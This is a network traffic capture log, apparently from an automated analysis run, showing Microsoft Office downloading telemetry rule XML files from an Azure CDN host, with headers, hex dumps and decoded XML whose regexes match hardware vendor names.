                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              41192.168.2.44979513.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:29 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:29 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:29 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 477
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                              ETag: "0x8DC582BB8CEAC16"
                                                                              x-ms-request-id: 94fafadb-001e-0049-3f27-265bd5000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064929Z-17c5cb586f6mhqqb91r8trf2c800000002dg000000009v8q
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:29 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              42192.168.2.44979313.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:29 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:29 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:29 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 469
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                              ETag: "0x8DC582BBA701121"
                                                                              x-ms-request-id: c47ae6f3-801e-007b-6937-26e7ab000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064929Z-r197bdfb6b4grkz4xgvkar0zcs0000000190000000003pff
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:29 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              43192.168.2.44979613.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:29 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:29 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:29 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 494
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                              ETag: "0x8DC582BB7010D66"
                                                                              x-ms-request-id: e7bd3bd0-f01e-003c-42e3-258cf0000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064929Z-15b8d89586ff5l62aha9080wv000000002xg000000005k70
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:29 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              44192.168.2.44979713.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:29 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:29 UTC491INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:29 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 464
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                              ETag: "0x8DC582B97FB6C3C"
                                                                              x-ms-request-id: 1a39e609-901e-0048-60a3-26b800000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064929Z-16849878b786jv8w2kpaf5zkqs00000000eg00000000525m
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache-Info: L1_T2
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:29 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              45192.168.2.44979913.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:30 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:30 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:30 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 419
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                              ETag: "0x8DC582B9748630E"
                                                                              x-ms-request-id: 66eaddbf-601e-0084-58ff-256b3f000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064930Z-17c5cb586f67p8ffw0hbk5rahw000000040000000000214n
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:30 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              46192.168.2.44980113.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:30 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:30 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:30 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 404
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                              ETag: "0x8DC582B9E8EE0F3"
                                                                              x-ms-request-id: 9956b93e-101e-0017-0e1a-2447c7000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064930Z-17c5cb586f6gkqkwd0x1ge8t04000000020g000000002fxg
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:30 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              47192.168.2.44980013.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:30 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:30 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:30 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 472
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                              ETag: "0x8DC582B9DACDF62"
                                                                              x-ms-request-id: 864201cb-901e-0015-2b18-26b284000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064930Z-16849878b78zqkvcwgr6h55x9n0000000140000000007t0f
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:30 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              48192.168.2.44980213.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:30 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:30 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:30 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 468
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                              ETag: "0x8DC582B9C8E04C8"
                                                                              x-ms-request-id: 9e6b2b63-d01e-008e-7443-26387a000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064930Z-r197bdfb6b47gqdjqh2kwsuz8c000000020000000000c785
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:30 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              49192.168.2.44980313.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:30 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:30 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:30 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 428
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                              ETag: "0x8DC582BAC4F34CA"
                                                                              x-ms-request-id: 6b700fd2-301e-005d-5b5a-26e448000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064930Z-r197bdfb6b4g24ztpxkw4umce80000000390000000002r2s
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:30 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              50192.168.2.44980513.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:31 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:31 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:31 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 415
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                              ETag: "0x8DC582B988EBD12"
                                                                              x-ms-request-id: 0124f848-201e-003f-38ad-246d94000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064931Z-15b8d89586f8nxpt6ys645x5v000000002x0000000002ypc
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:31 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              51192.168.2.44980413.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:31 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:31 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:31 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 499
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                              ETag: "0x8DC582B98CEC9F6"
                                                                              x-ms-request-id: 06b72246-101e-0079-2a0d-275913000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064931Z-16849878b78tg5n42kspfr0x4800000001mg00000000fqvz
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:31 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
